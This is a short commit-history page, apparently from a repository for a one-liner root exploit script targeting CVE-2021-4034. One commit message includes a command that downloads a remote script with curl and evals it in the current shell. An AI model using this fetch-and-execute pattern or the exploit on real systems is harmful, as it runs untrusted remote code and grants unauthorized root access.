Commit Graph

3 Commits

Author SHA1 Message Date
Harry Kurn
1012eca948
cve-2021-4034.sh: Don't exit the shell immediately when it fails
This fixes "exiting interactive shells" when the one-liner uses `eval`
the shell-script to the current shell. Without this commit, it is
actually possible to use eval in the shell as a command. For example:

$ sh -c 'eval "$(curl -s URL)"'

Signed-off-by: Harry Kurn <alternate-se7en@pm.me>
2022-01-29 20:32:10 +07:00
Davide Berardi
7c23bd118c Fixes for oneliner downloader 2022-01-29 10:30:06 +01:00
Nicholas Ferreira
465b0f35b2 One-liner root 2022-01-29 10:30:00 +01:00